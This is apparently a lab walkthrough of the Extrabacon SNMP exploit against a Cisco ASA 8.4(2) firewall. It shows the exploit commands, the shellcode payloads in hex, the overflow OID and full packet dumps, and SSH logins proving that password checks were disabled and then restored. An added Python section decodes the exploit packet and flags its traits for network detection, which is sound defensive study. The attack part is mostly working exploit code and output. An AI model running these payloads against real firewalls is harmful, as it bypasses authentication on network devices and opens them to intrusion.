# Extrabacon (EXBA) exploit


Normal SSH connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit

Checking exploit support

# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842

Launching the exploit (disabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected

SSH connection with passwords disabled (empty password accepted)

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit

Launching the exploit (re-enabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected

SSH connection after passwords are re-enabled (empty password rejected)

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:
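Added example, not part of the original post or of the exploit tooling: a minimal BER/SNMP decoder run over the 369-byte GetBulkRequest captured in the pass-enable run above, flagging the two traits a network detection can key on: a varbind OID under the Cisco enterprise subtree 1.3.6.1.4.1.9.9.491 with far more arcs than any legitimate instance (112 here), and a non-NULL value inside a read request (the 133-byte payload). The `max_arcs` threshold of 40 is an assumed heuristic, not a value from the page.

```python
EXBA_PKT = bytes.fromhex(  # the 369-byte GetBulkRequest from the pass-enable run above, copied from its hex dump
    "3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e9"
    "2f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3"
    "a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104"
    "010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e81"
    "2a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081"
    "108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500"
)

def read_tlv(buf, pos):  # one BER TLV at pos -> (tag, value bytes, position after it)
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def read_seq(buf):  # children of a constructed value as a list of (tag, value bytes)
    out, p = [], 0
    while p < len(buf):
        tag, val, p = read_tlv(buf, p)
        out.append((tag, val))
    return out

def decode_oid(raw):
    """BER OID bytes to dotted form; the first byte packs the first two arcs (0x2b = 1.3)."""
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)       # 7 data bits per byte, high bit set on all but the last
        if not b & 0x80:
            arcs, val = arcs + [val], 0
    return ".".join(map(str, arcs))

def parse_request(pkt):
    """Decode an SNMPv1/v2c message to (community, pdu_tag, request_id, [(oid, value_tag, value)])."""
    (_, _version), (_, community), (pdu_tag, pdu) = read_seq(read_tlv(pkt, 0)[1])
    (_, rid), _, _, (_, vbl) = read_seq(pdu)  # request-id, error-status, error-index, varbind list
    varbinds = [(decode_oid(o), vt, v) for (_, o), (vt, v) in (read_seq(vb) for _, vb in read_seq(vbl))]
    return community.decode("latin-1"), pdu_tag, int.from_bytes(rid, "big"), varbinds

def extrabacon_indicators(pkt, max_arcs=40):
    """Indicators that a read request carries the overflow above; max_arcs is an assumed heuristic limit."""
    _, pdu_tag, _, varbinds = parse_request(pkt)
    hits = []
    for oid, vtag, val in (varbinds if pdu_tag in (0xA0, 0xA1, 0xA5) else []):  # Get/GetNext/GetBulk only
        arcs = oid.count(".") + 1
        if oid.startswith("1.3.6.1.4.1.9.9.491.") and arcs > max_arcs:
            hits.append(("oversized_cisco_oid", arcs))
        if vtag != 0x05:                    # a read request carries NULL values; here it carries 133 payload bytes
            hits.append(("non_null_value", len(val)))
    return hits
```

The pass-disable packet dumped earlier has the identical layout (same lengths, same two varbinds) and yields the same two indicators; responses (tag 0xa2) are skipped because their varbinds legitimately carry values.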

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/
